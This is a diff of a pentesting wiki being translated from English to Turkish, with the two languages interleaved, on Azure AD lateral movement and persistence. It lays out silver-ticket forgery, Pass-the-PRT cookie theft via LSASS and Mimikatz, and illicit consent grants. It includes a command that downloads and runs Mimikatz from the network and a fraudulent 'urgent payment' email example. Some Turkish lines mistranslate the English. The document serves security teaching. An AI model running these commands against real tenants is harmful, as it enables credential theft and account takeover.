(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos
```
With the hash you can now **generate silver tickets**:
Hash ile artık **gümüş biletler** oluşturabilirsiniz:
```powershell
# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier
@@ -56,66 +53,57 @@ $at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."
```
To utilize the silver ticket, the following steps should be executed:
1. **Initiate the Browser:** Mozilla Firefox should be launched.
2. **Configure the Browser:**
- Navigate to **`about:config`**.
- Set the preference for [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) to the specified [values](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically):
- `https://aadg.windows.net.nsatc.net`
- `https://autologon.microsoftazuread-sso.com`
3. **Access the Web Application:**
- Visit a web application that is integrated with the organization's AAD domain. A common example is [Office 365](https://portal.office.com/).
4. **Authentication Process:**
- At the logon screen, the username should be entered, leaving the password field blank.
- To proceed, press either TAB or ENTER.
1. **Tarayıcıyı Başlatın:** Mozilla Firefox başlatılmalıdır.
2. **Tarayıcıyı Yapılandırın:**
- **`about:config`** sayfasına gidin.
- [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) için tercihi belirtilen [değerlere](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically) ayarlayın:
- `https://aadg.windows.net.nsatc.net`
- `https://autologon.microsoftazuread-sso.com`
3. **Web Uygulamasına Erişim:**
- Kuruluşun AAD alanı ile entegre bir web uygulamasını ziyaret edin. Yaygın bir örnek [Office 365](https://portal.office.com/)dir.
4. **Kimlik Doğrulama Süreci:**
- Giriş ekranında, kullanıcı adı girilmeli, şifre alanı boş bırakılmalıdır.
- Devam etmek için TAB veya ENTER tuşuna basın.
> [!TIP]
> This doesn't bypass MFA if enabled
> Bu, MFA etkinse atlatmaz
#### Option 2 without dcsync - SeamlessPass
#### Dcsync olmadan Seçenek 2 - SeamlessPass
It's also possible to perform this attack **without a dcsync attack** to be more stealth as [explained in this blog post](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). For that you only need one of the following:
Bu saldırıyı **dcsync saldırısı olmadan** daha gizli bir şekilde gerçekleştirmek de mümkündür, [bu blog yazısında açıklandığı gibi](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). Bunun için yalnızca aşağıdakilerden birine ihtiyacınız var:
- **A compromised user's TGT:** Even if you don't have one but the user was compromised,you can get one using fake TGT delegation trick implemented in many tools such as [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) and [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9).
- **Golden Ticket**: If you have the KRBTGT key, you can create the TGT you need for the attacked user.
- **A compromised users NTLM hash or AES key:** SeamlessPass will communicate with the domain controller with this information to generate the TGT
- **AZUREADSSOACC$ account NTLM hash or AES key:** With this info and the users Security Identifier (SID) to attack it's possible to create a service ticket an authenticate with the cloud (as performed in the previous method).
Finally, with the TGT it's possible to use the tool [**SeamlessPass**](https://github.com/Malcrove/SeamlessPass) with:
- **Bir tehlikeye atılmış kullanıcının TGT'si:** Eğer bir tane yoksa ama kullanıcı tehlikeye atıldıysa, birçok araçta uygulanan sahte TGT delegasyonu hilesi kullanılarak bir tane elde edilebilir, örneğin [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) ve [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9).
- **Golden Ticket**: Eğer KRBTGT anahtarına sahipseniz, saldırıya uğrayan kullanıcı için gerekli TGT'yi oluşturabilirsiniz.
- **Bir tehlikeye atılmış kullanıcının NTLM hash'i veya AES anahtarı:** SeamlessPass, bu bilgi ile etki alanı denetleyicisi ile iletişim kurarak TGT'yi oluşturacaktır.
- **AZUREADSSOACC$ hesabı NTLM hash'i veya AES anahtarı:** Bu bilgi ve saldırı yapılacak kullanıcının Güvenlik Tanımlayıcısı (SID) ile bir hizmet bileti oluşturmak ve bulut ile kimlik doğrulamak mümkündür (önceki yöntemde olduğu gibi).
Son olarak, TGT ile [**SeamlessPass**](https://github.com/Malcrove/SeamlessPass) aracını kullanmak mümkündür:
```
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_TGT>
```
Daha fazla bilgi için Firefox'un kesintisiz SSO ile çalışmasını sağlamak üzere [**bu blog yazısında**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/) bulunabilir.
Further information to set Firefox to work with seamless SSO can be [**found in this blog post**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/).
#### ~~Bulut yalnızca kullanıcılar için Kerberos biletleri oluşturma~~ <a href="#creating-kerberos-tickets-for-cloud-only-users" id="creating-kerberos-tickets-for-cloud-only-users"></a>
#### ~~Creating Kerberos tickets for cloud-only users~~ <a href="#creating-kerberos-tickets-for-cloud-only-users" id="creating-kerberos-tickets-for-cloud-only-users"></a>
If the Active Directory administrators have access to Azure AD Connect, they can **set SID for any cloud-user**. This way Kerberos **tickets** can be **created also for cloud-only users**. The only requirement is that the SID is a proper [SID](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778824(v=ws.10)>).
Eğer Active Directory yöneticileri Azure AD Connect'e erişime sahipse, **herhangi bir bulut kullanıcısı için SID ayarlayabilirler**. Bu şekilde Kerberos **biletleri** **bulut yalnızca kullanıcılar için de oluşturulabilir**. Tek gereklilik, SID'nin uygun bir [SID](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778824(v=ws.10)>) olmasıdır.
> [!CAUTION]
> Changing SID of cloud-only admin users is now **blocked by Microsoft**.\
> For info check [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/)
> Bulut yalnızca yönetici kullanıcıların SID'sini değiştirmek artık **Microsoft tarafından engellenmiştir**.\
> Bilgi için [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/)
### On-prem -> Cloud via Resource Based Constrained Delegation <a href="#creating-kerberos-tickets-for-cloud-only-users" id="creating-kerberos-tickets-for-cloud-only-users"></a>
Anyone that can manage computer accounts (`AZUREADSSOACC$`) in the container or OU this account is in, it can **configure a resource based constrained delegation over the account and access it**.
### On-prem -> Bulut, Kaynak Tabanlı Kısıtlı Delegasyon ile <a href="#creating-kerberos-tickets-for-cloud-only-users" id="creating-kerberos-tickets-for-cloud-only-users"></a>
Bu hesabın bulunduğu konteyner veya OU'da bilgisayar hesaplarını yönetebilen herkes, **hesap üzerinde kaynak tabanlı kısıtlı delegasyonu yapılandırabilir ve ona erişebilir**.
```python
python rbdel.py -u <workgroup>\\<user> -p <pass> <ip> azureadssosvc$
```
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso)
- [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
- [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/)
- [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg)
- [TR19: Bulutundayım, herkesin e-postalarını okuyorum - Active Directory aracılığıyla Azure AD'yi hackleme](https://www.youtube.com/watch?v=JEIR5oGCwdg)
{{#include ../../../../banners/hacktricks-training.md}}

168
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md
View File

@@ -2,77 +2,72 @@
{{#include ../../../banners/hacktricks-training.md}}
## What is a PRT
## PRT Nedir
{{#ref}}
az-primary-refresh-token-prt.md
{{#endref}}
### Check if you have a PRT
### PRT'niz olup olmadığını kontrol edin
```
Dsregcmd.exe /status
```
In the SSO State section, you should see the **`AzureAdPrt`** set to **YES**.
SSO Durumu bölümünde, **`AzureAdPrt`** değerinin **EVET** olarak ayarlandığını görmelisiniz.
<figure><img src="../../../images/image (140).png" alt=""><figcaption></figcaption></figure>
In the same output you can also see if the **device is joined to Azure** (in the field `AzureAdJoined`):
Aynı çıktıda, **cihazın Azure'a katılıp katılmadığını** da görebilirsiniz ( `AzureAdJoined` alanında):
<figure><img src="../../../images/image (135).png" alt=""><figcaption></figcaption></figure>
## PRT Cookie
The PRT cookie is actually called **`x-ms-RefreshTokenCredential`** and it's a JSON Web Token (JWT). A JWT contains **3 parts**, the **header**, **payload** and **signature**, divided by a `.` and all url-safe base64 encoded. A typical PRT cookie contains the following header and body:
## PRT Çerezi
PRT çerezi aslında **`x-ms-RefreshTokenCredential`** olarak adlandırılır ve bir JSON Web Token (JWT) içerir. Bir JWT, **3 bölüm** içerir: **başlık**, **yük** ve **imza**, `.` ile ayrılmış ve tümü url güvenli base64 ile kodlanmıştır. Tipik bir PRT çerezi aşağıdaki başlık ve gövdeyi içerir:
```json
{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}
```
Gerçek **Primary Refresh Token (PRT)**, **`refresh_token`** içinde kapsüllenmiştir ve bu, Azure AD'nin kontrolü altındaki bir anahtar ile şifrelenmiştir, bu da içeriğini bizim için opak ve şifrelenemez hale getirir. **`is_primary`** alanı, bu token içinde birincil yenileme token'ının kapsüllendiğini belirtir. Cookie'nin, hedeflendiği belirli oturumla bağlı kalmasını sağlamak için, `request_nonce` `logon.microsoftonline.com` sayfasından iletilir.
The actual **Primary Refresh Token (PRT)** is encapsulated within the **`refresh_token`**, which is encrypted by a key under the control of Azure AD, rendering its contents opaque and undecryptable to us. The field **`is_primary`** signifies the encapsulation of the primary refresh token within this token. To ensure that the cookie remains bound to the specific login session it was intended for, the `request_nonce` is transmitted from the `logon.microsoftonline.com` page.
### TPM kullanarak PRT Cookie akışı
### PRT Cookie flow using TPM
**LSASS** süreci, **KDF bağlamını** TPM'ye gönderecek ve TPM, **session key** (cihaz AzureAD'ye kaydedildiğinde toplanan ve TPM'de saklanan) ve önceki bağlamı kullanarak bir **anahtar türetecek** ve bu **türetilmiş anahtar**, **PRT cookie'sini (JWT)** imzalamak için kullanılacaktır.
The **LSASS** process will send to the TPM the **KDF context**, and the TPM will used **session key** (gathered when the device was registered in AzureAD and stored in the TPM) and the previous context to **derivate** a **key,** and this **derived key** is used to **sign the PRT cookie (JWT).**
**KDF bağlamı**, AzureAD'den bir nonce ve PRT'yi içeren bir **JWT** ile karıştırılmış bir **bağlamdır** (rastgele baytlar).
The **KDF context is** a nonce from AzureAD and the PRT creating a **JWT** mixed with a **context** (random bytes).
Therefore, even if the PRT cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to **request derived keys from new contexts and use the generated keys to sign Cookies**.
Bu nedenle, PRT TPM içinde bulunduğu için çıkarılamasa da, LSASS'ı kötüye kullanarak **yeni bağlamlardan türetilmiş anahtarlar talep etmek ve üretilen anahtarları Cookie'leri imzalamak için kullanmak** mümkündür.
<figure><img src="../../../images/image (31).png" alt=""><figcaption></figcaption></figure>
## PRT Abuse Scenarios
## PRT Kötüye Kullanım Senaryoları
As a **regular user** it's possible to **request PRT usage** by asking LSASS for SSO data.\
This can be done like **native apps** which request tokens from **Web Account Manager** (token broker). WAM pasess the request to **LSASS**, which asks for tokens using signed PRT assertion. Or it can be down with **browser based (web) flow**s where a **PRT cookie** is used as **header** to authenticate requests to Azure AS login pages.
**Normal bir kullanıcı** olarak, LSASS'tan SSO verileri talep ederek **PRT kullanımını talep etmek** mümkündür.\
Bu, **Web Account Manager**'dan (token broker) token talep eden **yerel uygulamalar** gibi yapılabilir. WAM, talebi **LSASS**'a iletir ve LSASS, imzalı PRT beyanı kullanarak token talep eder. Ya da **PRT cookie'sinin** Azure AS giriş sayfalarına yapılan talepleri kimlik doğrulamak için **header** olarak kullanıldığı **tarayıcı tabanlı (web) akışları** ile yapılabilir.
As **SYSTEM** you could **steal the PRT if not protected** by TPM or **interact with PRT keys in LSASS** using crypto APIs.
**SYSTEM** olarak, eğer TPM ile korunmuyorsa **PRT'yi çalabilir** veya **LSASS'ta PRT anahtarları ile etkileşimde bulunabilirsiniz**.
## Pass-the-PRT Attack Examples
## Pass-the-PRT Saldırı Örnekleri
### Attack - ROADtoken
### Saldırı - ROADtoken
For more info about this way [**check this post**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/). ROADtoken will run **`BrowserCore.exe`** from the right directory and use it to **obtain a PRT cookie**. This cookie can then be used with ROADtools to authenticate and **obtain a persistent refresh token**.
To generate a valid PRT cookie the first thing you need is a nonce.\
You can get this with:
Bu yöntem hakkında daha fazla bilgi için [**bu gönderiyi kontrol edin**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/). ROADtoken, doğru dizinden **`BrowserCore.exe`** çalıştıracak ve bunu **PRT cookie'si elde etmek** için kullanacaktır. Bu cookie daha sonra ROADtools ile kimlik doğrulamak ve **kalıcı bir yenileme token'ı elde etmek** için kullanılabilir.
Geçerli bir PRT cookie'si oluşturmak için ilk ihtiyacınız olan bir nonce'dur.\
Bunu şu şekilde alabilirsiniz:
```powershell
$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"
$Params = @{
"URI" = $URL
"Method" = "POST"
"URI" = $URL
"Method" = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
@@ -81,27 +76,19 @@ $Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA
```
Or using [**roadrecon**](https://github.com/dirkjanm/ROADtools):
Veya [**roadrecon**](https://github.com/dirkjanm/ROADtools) kullanarak:
```powershell
roadrecon auth prt-init
```
Then you can use [**roadtoken**](https://github.com/dirkjanm/ROADtoken) to get a new PRT (run in the tool from a process of the user to attack):
Sonra yeni bir PRT almak için [**roadtoken**](https://github.com/dirkjanm/ROADtoken) kullanabilirsiniz (saldırı için kullanıcının bir sürecinden aracı çalıştırın):
```powershell
.\ROADtoken.exe <nonce>
```
As oneliner:
Bir satırlık:
```powershell
Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}
```
Then you can use the **generated cookie** to **generate tokens** to **login** using Azure AD **Graph** or Microsoft Graph:
Sonra **oluşturulan çerezi** kullanarak **jetonlar oluşturabilir** ve Azure AD **Graph** veya Microsoft Graph kullanarak **giriş yapabilirsiniz**:
```powershell
# Generate
roadrecon auth --prt-cookie <prt_cookie>
@@ -109,13 +96,11 @@ roadrecon auth --prt-cookie <prt_cookie>
# Connect
Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>
```
### Saldırı - roadrecon Kullanarak
### Attack - Using roadrecon
### Attack - Using AADInternals and a leaked PRT
`Get-AADIntUserPRTToken` **gets users PRT token** from the Azure AD joined or Hybrid joined computer. Uses `BrowserCore.exe` to get the PRT token.
### Saldırı - AADInternals ve sızdırılmış PRT Kullanarak
`Get-AADIntUserPRTToken` **kullanıcının PRT token'ını** Azure AD bağlı veya Hibrit bağlı bilgisayardan alır. PRT token'ını almak için `BrowserCore.exe` kullanır.
```powershell
# Get the PRToken
$prtToken = Get-AADIntUserPRTToken
@@ -123,9 +108,7 @@ $prtToken = Get-AADIntUserPRTToken
# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
```
Or if you have the values from Mimikatz you can also use AADInternals to generate a token:
Ya da Mimikatz'tan değerleriniz varsa, bir token oluşturmak için AADInternals'ı da kullanabilirsiniz:
```powershell
# Mimikat "PRT" value
$MimikatzPRT="MC5BWU..."
@@ -153,40 +136,36 @@ $AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken
# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>
```
Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie.
[https://login.microsoftonline.com](https://login.microsoftonline.com) adresine gidin, login.microsoftonline.com için tüm çerezleri temizleyin ve yeni bir çerez girin.
```
Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)
```
Then go to [https://portal.azure.com](https://portal.azure.com)
Sonra [https://portal.azure.com](https://portal.azure.com) adresine gidin.
> [!CAUTION]
> The rest should be the defaults. Make sure you can refresh the page and the cookie doesnt disappear, if it does, you may have made a mistake and have to go through the process again. If it doesnt, you should be good.
> Geri kalanlar varsayılan olmalıdır. Sayfayı yenileyebildiğinizden ve çerezin kaybolmadığından emin olun, eğer kaybolursa bir hata yapmış olabilirsiniz ve süreci tekrar gözden geçirmeniz gerekebilir. Eğer kaybolmuyorsa, her şey yolunda olmalıdır.
### Attack - Mimikatz
### Saldırı - Mimikatz
#### Steps
#### Adımlar
1. The **PRT (Primary Refresh Token) is extracted from LSASS** (Local Security Authority Subsystem Service) and stored for subsequent use.
2. The **Session Key is extracted next**. Given that this key is initially issued and then re-encrypted by the local device, it necessitates decryption using a DPAPI masterkey. Detailed information about DPAPI (Data Protection API) can be found in these resources: [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) and for an understanding of its application, refer to [Pass-the-cookie attack](az-pass-the-cookie.md).
3. Post decryption of the Session Key, the **derived key and context for the PRT are obtained**. These are crucial for the **creation of the PRT cookie**. Specifically, the derived key is employed for signing the JWT (JSON Web Token) that constitutes the cookie. A comprehensive explanation of this process has been provided by Dirk-jan, accessible [here](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/).
1. **PRT (Birincil Yenileme Token'ı) LSASS'tan** (Yerel Güvenlik Otoritesi Alt Sistem Servisi) çıkarılır ve sonraki kullanım için saklanır.
2. **Oturum Anahtarı daha sonra çıkarılır**. Bu anahtar başlangıçta verildiği ve ardından yerel cihaz tarafından yeniden şifrelenmesi gerektiğinden, bir DPAPI anahtar kelimesi kullanılarak şifre çözme gerektirir. DPAPI (Veri Koruma API) hakkında ayrıntılı bilgi bu kaynaklarda bulunabilir: [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) ve uygulamasını anlamak için [Pass-the-cookie attack](az-pass-the-cookie.md) referansına bakabilirsiniz.
3. Oturum Anahtarı şifresi çözüldükten sonra, **PRT için türetilmiş anahtar ve bağlam elde edilir**. Bunlar **PRT çerezi oluşturmak için** kritik öneme sahiptir. Özellikle, türetilmiş anahtar, çerezi oluşturan JWT'yi (JSON Web Token) imzalamak için kullanılır. Bu sürecin kapsamlı bir açıklaması Dirk-jan tarafından sağlanmıştır, [buradan](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/) erişebilirsiniz.
> [!CAUTION]
> Note that if the PRT is inside the TPM and not inside `lsass` **mimikatz won't be able to extract it**.\
> However, it will be possible to g**et a key from a derive key from a context** from the TPM and use it to **sign a cookie (check option 3).**
> PRT'nin TPM içinde ve `lsass` içinde değilse, **mimikatz bunu çıkaramayacaktır**.\
> Ancak, TPM'den bir bağlamdan türetilmiş bir anahtar almak ve bunu **bir çerezi imzalamak için kullanmak** mümkün olacaktır (seçenek 3'ü kontrol edin).
You can find an **in depth explanation of the performed process** to extract these details in here: [**https://dirkjanm.io/digging-further-into-the-primary-refresh-token/**](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/)
Bu ayrıntıları çıkarmak için gerçekleştirilen sürecin **derinlemesine açıklamasını** burada bulabilirsiniz: [**https://dirkjanm.io/digging-further-into-the-primary-refresh-token/**](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/)
> [!WARNING]
> This won't exactly work post August 2021 fixes to get other users PRT tokens as only the user can get his PRT (a local admin cannot access other users PRTs), but can access his.
You can use **mimikatz** to extract the PRT:
> Bu, yalnızca kullanıcı kendi PRT'sini alabileceğinden, diğer kullanıcıların PRT token'larını almak için Ağustos 2021 düzeltmelerinden sonra tam olarak çalışmayacaktır (yerel bir yönetici diğer kullanıcıların PRT'lerine erişemez), ancak kendi PRT'sine erişebilir.
**mimikatz** kullanarak PRT'yi çıkarabilirsiniz:
```powershell
mimikatz.exe
Privilege::debug
@@ -196,93 +175,76 @@ Sekurlsa::cloudap
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
```
(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)
<figure><img src="../../../images/image (251).png" alt=""><figcaption></figcaption></figure>
**Copy** the part labeled **Prt** and save it.\
Extract also the session key (the **`KeyValue`** of the **`ProofOfPossesionKey`** field) which you can see highlighted below. This is encrypted and we will need to use our DPAPI masterkeys to decrypt it.
**Prt** olarak etiketlenmiş kısmı **kopyalayın** ve kaydedin.\
Ayrıca aşağıda vurgulanan **`ProofOfPossesionKey`** alanının **`KeyValue`**'sini de çıkarın. Bu şifrelenmiştir ve bunu çözmek için DPAPI anahtarlarımıza ihtiyacımız olacak.
<figure><img src="../../../images/image (182).png" alt=""><figcaption></figcaption></figure>
> [!NOTE]
> If you dont see any PRT data it could be that you **dont have any PRTs** because your device isnt Azure AD joined or it could be you are **running an old version** of Windows 10.
To **decrypt** the session key you need to **elevate** your privileges to **SYSTEM** to run under the computer context to be able to use the **DPAPI masterkey to decrypt it**. You can use the following commands to do so:
> Eğer herhangi bir PRT verisi görmüyorsanız, bunun nedeni **PRT'nizin olmaması** olabilir çünkü cihazınız Azure AD ile bağlı değil ya da **eski bir Windows 10 sürümü** kullanıyor olabilirsiniz.
Oturum anahtarını **şifrelemek için** yetkilerinizi **SYSTEM** seviyesine **yükseltmeniz** gerekiyor, böylece bilgisayar bağlamında çalışarak **DPAPI anahtarını kullanarak şifreleyebilirsiniz**. Bunu yapmak için aşağıdaki komutları kullanabilirsiniz:
```
token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect
```
<figure><img src="../../../images/image (183).png" alt=""><figcaption></figcaption></figure>
#### Option 1 - Full Mimikatz
#### Seçenek 1 - Tam Mimikatz
- Now you want to copy both the Context value:
- Şimdi hem Context değerini kopyalamak istiyorsunuz:
<figure><img src="../../../images/image (210).png" alt=""><figcaption></figcaption></figure>
- And the derived key value:
- Hem de türetilmiş anahtar değerini:
<figure><img src="../../../images/image (150).png" alt=""><figcaption></figcaption></figure>
- Finally you can use all this info to **generate PRT cookies**:
- Son olarak, bu bilgileri **PRT çerezleri oluşturmak için** kullanabilirsiniz:
```bash
Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]
```
<figure><img src="../../../images/image (282).png" alt=""><figcaption></figcaption></figure>
- Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie.
- [https://login.microsoftonline.com](https://login.microsoftonline.com) adresine gidin, login.microsoftonline.com için tüm çerezleri temizleyin ve yeni bir çerez girin.
```
Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)
```
- Then go to [https://portal.azure.com](https://portal.azure.com)
- Sonra [https://portal.azure.com](https://portal.azure.com) adresine gidin.
> [!CAUTION]
> The rest should be the defaults. Make sure you can refresh the page and the cookie doesnt disappear, if it does, you may have made a mistake and have to go through the process again. If it doesnt, you should be good.
> Geri kalanlar varsayılan olmalıdır. Sayfayı yenileyebildiğinizden ve çerezin kaybolmadığından emin olun, eğer kaybolursa bir hata yapmış olabilirsiniz ve süreci tekrar gözden geçirmeniz gerekebilir. Eğer kaybolmazsa, her şey yolunda olmalıdır.
#### Option 2 - roadrecon using PRT
- Renew the PRT first, which will save it in `roadtx.prt`:
#### Seçenek 2 - roadrecon kullanarak PRT
- Öncelikle PRT'yi yenileyin, bu `roadtx.prt` dosyasına kaydedilecektir:
```bash
roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>
```
- Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim.
- Artık `roadtx browserprtauth` ile etkileşimli tarayıcı kullanarak **token talep edebiliriz**. `roadtx describe` komutunu kullanırsak, erişim tokeninin bir MFA talebi içerdiğini görürüz çünkü bu durumda kullandığım PRT de bir MFA talebine sahipti.
```bash
roadtx browserprtauth
roadtx describe < .roadtools_auth
```
<figure><img src="../../../images/image (44).png" alt=""><figcaption></figcaption></figure>
#### Option 3 - roadrecon using derived keys
Having the context and the derived key dumped by mimikatz, it's possible to use roadrecon to generate a new signed cookie with:
#### Seçenek 3 - roadrecon türetilmiş anahtarlar kullanarak
Mimikatz tarafından dökülen bağlam ve türetilmiş anahtar ile, roadrecon kullanarak yeni bir imzalı çerez oluşturmak mümkündür:
```bash
roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>
```
## References
## Referanslar
- [https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/)
- [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/)
- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
{{#include ../../../banners/hacktricks-training.md}}

44
src/pentesting-cloud/azure-security/az-persistence/README.md
View File

@@ -2,54 +2,45 @@
{{#include ../../../banners/hacktricks-training.md}}
### Illicit Consent Grant
### Yasadışı İzin Verme
By default, any user can register an application in Azure AD. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to **execute phishing attacks** that would be very **fruitful** in case of success.
Varsayılan olarak, herhangi bir kullanıcı Azure AD'de bir uygulama kaydedebilir. Bu nedenle, yüksek etki izinlerine ihtiyaç duyan (ve eğer admin iseniz onaylayabileceğiniz) bir uygulama kaydedebilirsiniz - örneğin, bir kullanıcının adına mail gönderme, rol yönetimi vb. Bu, başarılı olması durumunda çok **verimli** olacak **oltalama saldırıları** gerçekleştirmemizi sağlayacaktır.
Moreover, you could also accept that application with your user as a way to maintain access over it.
Ayrıca, bu uygulamayı kullanıcı olarak kabul ederek ona erişimi sürdürme yolunu da seçebilirsiniz.
### Applications and Service Principals
### Uygulamalar ve Hizmet Prensipleri
With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application.
Uygulama Yöneticisi, GA veya microsoft.directory/applications/credentials/update izinlerine sahip özel bir rol ile, mevcut bir uygulamaya kimlik bilgileri (gizli anahtar veya sertifika) ekleyebiliriz.
It's possible to **target an application with high permissions** or **add a new application** with high permissions.
Yüksek izinlere sahip bir **uygulamayı hedef almak** veya **yüksek izinlere sahip yeni bir uygulama eklemek** mümkündür.
An interesting role to add to the application would be **Privileged authentication administrator role** as it allows to **reset password** of Global Administrators.
This technique also allows to **bypass MFA**.
Uygulamaya eklemek için ilginç bir rol, **Ayrıcalıklı kimlik doğrulama yöneticisi rolü** olacaktır çünkü bu, Küresel Yöneticilerin **şifresini sıfırlama** yetkisi verir.
Bu teknik ayrıca **MFA'yı atlatmayı** da sağlar.
```powershell
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
